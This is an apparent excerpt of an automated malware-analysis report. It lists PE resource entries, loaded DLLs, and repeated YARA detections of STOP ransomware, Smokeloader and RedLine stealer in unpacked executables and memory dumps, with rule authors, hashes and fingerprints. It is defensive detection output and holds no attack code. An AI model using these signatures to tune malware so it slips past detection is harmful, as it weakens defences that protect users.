                    Source: irbiwat.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: irbiwat.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: irbiwat.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: irbiwat.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.28.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.28.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.28.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.28.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.28.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.28.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.28.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.28.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Windows\explorer.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\E69F.exeSection loaded: ffrrgwf.dll
                    Source: sqlite3.dll.20.drStatic PE information: Number of sections : 18 > 10
                    Source: 5tLwjRFzAW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 28.0.A658.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.0.A658.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.0.A658.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.0.A658.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.0.A658.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.0.A658.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.0.A658.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 27.2.A658.exe.23415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 27.2.A658.exe.23415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 27.2.A658.exe.23415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.0.A658.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.0.A658.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.0.A658.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 27.2.A658.exe.23415a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 27.2.A658.exe.23415a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 27.2.A658.exe.23415a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.0.A658.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.0.A658.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.0.A658.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.0.A658.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.0.A658.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.0.A658.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.0.A658.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.0.A658.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.0.A658.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.0.A658.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.0.A658.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.0.A658.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.2.A658.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.2.A658.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.2.A658.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.0.A658.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.0.A658.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.0.A658.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.2.A658.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.2.A658.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.2.A658.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.0.A658.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.0.A658.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.0.A658.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.0.A658.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.0.A658.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.0.A658.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.0.A658.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.0.A658.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.0.A658.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 28.0.A658.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 28.0.A658.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 28.0.A658.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 00000011.00000002.343161421.00000000040E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000000.00000002.294980929.00000000026E7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 00000014.00000002.419481551.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 0000001B.00000002.457366920.000000000066D000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                    Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                    Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000004.00000000.278637701.0000000002651000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                    Source: 00000011.00000002.342997867.0000000002546000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.294639140.0000000002680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000014.00000002.418304961.0000000000499000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.294702276.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 0000001C.00000000.445516045.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
